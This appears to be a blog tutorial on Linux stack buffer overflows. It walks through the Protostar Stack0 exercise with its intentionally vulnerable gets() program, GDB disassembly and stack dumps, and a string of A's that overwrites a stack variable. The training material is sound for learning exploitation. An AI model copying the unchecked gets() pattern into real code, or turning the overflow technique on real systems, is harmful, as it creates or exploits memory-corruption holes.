Introduction
In this post, we dive into the basics of Linux exploitation, starting with the first class of bug: stack buffer overflows. We begin with memory corruption, which gives us a good understanding of how memory is laid out in a Linux process, and from there we gradually work our way toward developing a complete exploit.
Setup
Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.
So grab an ISO from Protostar and set it up in your virtual machine manager of choice. I will be using VirtualBox, as always. We will use ssh to log into this VM (run hostname -I inside the VM to get its local IP). The default credentials for Protostar are user:user.
Tools
For Linux, the choice of debuggers isn’t as varied as on Windows. Throughout our journey, we will mainly be using GDB (the GNU Debugger), the standard debugger on most Linux systems. Alternatively, you can use EDB.
As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).
Static Code Analysis
To see the source code of a challenge, we navigate to the exploit exercises website, where the source for every challenge is given. We will start with the Stack0 challenge, which focuses on memory corruption. Take a look at the code below:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
  } else {
    printf("Try again?\n");
  }
}
The includes just pull in the usual C headers. stdlib.h is the general-purpose standard library header, covering memory allocation, process control, and so on.
unistd.h is a header file that provides access to the POSIX operating system API.
stdio.h is the standard input/output header, which declares functions such as gets() and printf().
The main function declares two local variables: buffer, an array of 64 characters, and modified, a volatile integer. The volatile qualifier tells the compiler that the variable may change in ways it cannot see, so it must not optimize away reads of modified. The main function also receives the usual argc and argv parameters, although this program never uses them.
int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
modified is initially set to 0, and the line after that reads a line of our input into buffer. The function that does this is gets().
  modified = 0;
  gets(buffer);
Now here is where our vulnerability lies: in the gets() function. gets() has no idea how large the destination is, so it performs no length check whatsoever. It keeps reading from standard input and writing into memory on the stack until it finds a newline. This means that if we enter more data than the 64-byte buffer can hold, our string will OVERFLOW past the end of the buffer and start overwriting whatever sits after it, until our string ends.
In this case, we need to change the value of the modified variable, which is located somewhere on the stack. The if-else condition tells us that we succeed once modified holds anything other than 0 (i.e. modified != 0).
  if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
  } else {
    printf("Try again?\n");
  }
Alrighty then! Now that we have analyzed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.
So first, fire up the Protostar VM, and use the command hostname -I to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the interface that’s currently in use. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/.
Debugging
To open the binary in GDB, we will use the command $ gdb stack0, followed by the command disas main inside gdb, which will disassemble the main function for us. What you see is a representation of the binary in assembly.
0x080483f4 <main+0>: push %ebp
0x080483f5 <main+1>: mov %esp,%ebp
0x080483f7 <main+3>: and $0xfffffff0,%esp
0x080483fa <main+6>: sub $0x60,%esp
0x080483fd <main+9>: movl $0x0,0x5c(%esp)
0x08048405 <main+17>: lea 0x1c(%esp),%eax
0x08048409 <main+21>: mov %eax,(%esp)
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov 0x5c(%esp),%eax
0x08048415 <main+33>: test %eax,%eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: movl $0x8048500,(%esp)
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: movl $0x8048529,(%esp)
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
So right off the bat, even if you don’t understand assembly too well, you can see the call instruction, calling the function gets() at the address 0x0804840c. This will come in handy during testing.
So a few things before we continue:
- ESP is our stack pointer. It points to the top of the stack, which on x86 is the lowest address currently in use.
- PUSH is an instruction that places a value (here, the contents of a register) on top of the stack.
- JMP is an instruction that jumps to a particular address to continue execution flow. JE is “jump if equal to”: after the comparison (the test instruction), it jumps to the given location only if the condition is satisfied, which here means EAX was zero. Together, test and je implement the “if-else” statement in our code.
Our objective here is to change the value of the modified variable from 0 to anything else. modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a region of the stack that lies before this variable (at a lower address) in order to reach it.
There is one line in the disassembly that is particularly interesting, though: the movl at 0x080483fd. It moves the value 0 (hex 0x0) to the location esp + 0x5c.
This tells us the location of the modified variable on the stack. Now, we will set our breakpoints on the call instruction we noted earlier and on the instruction right after it. A breakpoint is a pause in the execution flow of the binary, which will help us understand how values on the stack change after a particular instruction is executed.
We will do this by executing:
(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)
This will stop the execution flow before the call to gets() is made, and again after it returns, before the value of modified is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r.
(gdb) r
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
So we hit our first breakpoint, right before the call to gets(). If we run i r, it will give us further information on the registers at this point in time.
(gdb) i r
eax 0xbffffc5c -1073742756
ecx 0x644d8780 1682802560
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffffc40 0xbffffc40
ebp 0xbffffca8 0xbffffca8
esi 0x0 0
edi 0x0 0
eip 0x804840c 0x804840c <main+24>
eflags 0x200282 [ SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
We can see that the address of the call instruction is in the EIP register. EIP holds the address of the next instruction to be executed. Now, let’s take a look at what the stack looks like right now by executing x/32wx $esp. This will print 32 hexadecimal words off the stack. The count of 32 is arbitrary; it is simply enough to cover the area we care about.
(gdb) x/32wx $esp
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0xb7eada75
0xbffffc60: 0xb7fd7ff4 0x08049620 0xbffffc78 0x080482e8
0xbffffc70: 0xb7ff1040 0x08049620 0xbffffca8 0x08048469
0xbffffc80: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffca8
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffffca0: 0x08048450 0x00000000 0xbffffd28 0xb7eadc76
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
We can use this to find the location of the modified variable. To find the address, we execute x/wx $esp+0x5c, as we know from earlier that the variable is stored at the location $esp+0x5c, or 0x5c(%esp). The x stands for ‘examine’, and /wx asks for one word printed in hexadecimal, so this will give us the address and the contents of modified.
(gdb) x/wx $esp+0x5c
0xbffffc9c: 0x00000000
From this, we can see that the address of modified on the stack is 0xbffffc9c, and it contains 0. If we match this against our stack dump from earlier, this is where modified is:
                          These are contents
             |---------------------|---------------------|
             |                                           |
0xbffffc90:  0xb7ec6365  0xb7ff1040  0x0804845b  0x00000000  <---- modified
Addresses:   0xbffffc90  0xbffffc94  0xbffffc98  0xbffffc9c
Each word here is 4 bytes long, and the address before the colon is the address of the first word in the row, so the first value after the colon is the contents of c90. If we add 4 bytes to c90 three times, until we reach 0x00000000, we get the address c9c. This is how the math works out in GDB.
Now, let’s continue execution flow by executing c. Then, let’s just enter a few A’s as a test. That way, we will know the location of our buffer on the stack.
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13 in stack0/stack0.c
We hit our second breakpoint, which is right before the binary moves the value of modified to EAX for the comparison (the if-else check). Now, let’s take a look at the stack:
(gdb) x/32wx $esp
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0x41414141
0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc70: 0x41414141 0x41414141 0xbffffc00 0x08048469
0xbffffc80: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffffca8
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000 <-----
0xbffffca0: 0x08048450 0x00000000 0xbffffd28 0xb7eadc76
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
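So the hexadecimal value of A is 0x41. We can see our A’s starting at 0xbffffc5c, the last word of the 0xbffffc50 row. This suggests that our buffer starts at this address, which matches the value in EAX before the call and the lea 0x1c(%esp),%eax in the disassembly. We can also see that we still have not reached the modified variable, which is why its value is unchanged. Remember the size of our buffer? 64. The distance from 0xbffffc5c to 0xbffffc9c is also 64 bytes, so anything longer than 64 A’s will spill into modified. If we enter 80 A’s, we should comfortably overflow into the modified variable and change its value. Let’s give this a shot: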
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11 in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13 in stack0/stack0.c
(gdb) x/32wx $esp
0xbffffc40: 0xbffffc5c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffffc50: 0xb7fd7ff4 0xb7ec6165 0xbffffc68 0x41414141
0xbffffc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc80: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 <----
0xbffffca0: 0x41414141 0x41414141 0x41414141 0xb7eadc00
0xbffffcb0: 0x00000001 0xbffffd54 0xbffffd5c 0xb7fe1848
Et voila! We have overwritten the value of the modified variable, and also overwritten what follows it on the stack with our A’s. Let’s do this outside of GDB now:
$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault
We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!